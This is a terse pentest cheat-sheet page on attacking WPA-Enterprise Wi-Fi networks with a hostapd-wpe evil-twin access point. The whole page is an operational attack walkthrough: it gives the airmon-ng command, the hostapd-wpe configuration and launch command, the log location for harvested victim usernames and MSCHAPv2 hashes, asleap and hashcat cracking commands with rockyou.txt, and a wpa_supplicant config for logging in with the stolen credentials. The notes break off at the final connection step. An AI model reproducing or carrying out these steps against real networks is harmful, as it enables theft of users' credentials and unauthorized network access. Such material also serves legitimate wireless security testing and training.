# WPA-E (hostapd)
Capture the cert first using monitor mode:
using wireshark then filter the certificate:
```
tls.handshake.certificate
```
{% hint style="info" %}
Don't forget to kill all wifi usage first
{% endhint %}
```
sudo airmon-ng check kill
```
Make sure know the target SSID, this technique seems to be an Evil-Twin attack of the wifi access point.
change file in `/etc/hostapd-wpe/hostapd-wpe.conf`
```
# Configuration file for hostapd-wpe
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=wlan1
# May have to change these depending on build location
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh
# 802.11 Options
ssid=hostapd-wpe
channel=1
[snip]
```
Run Evil Twin:
```
sudo ./hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
```
After victim input username and password:
or check the log:
```bash
cat /var/log/hostapd-wpe.log
```
Then crack the password with rockyou.txt:
```bash
asleap -C -R -W /usr/share/wordlist/rockyou.txt
```
alternatively using hashcat:
```
hashcat -m 5500 ./hash_wifi.txt /usr/share/wordlist/rockyou.txt
```
{% hint style="info" %}
you need to use asleap v2.2
{% endhint %}
ref:
{% embed url="" %}
***
After got the password and the username connect with terminal:
create config file **connect\_wpa-e.conf**
```
network={
scan_ssid=1
eap=PEAP
ssid=""
key_mgmt=WPA-EAP
identity=""
password=""
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
```
Then connect with wpa-supplicant:
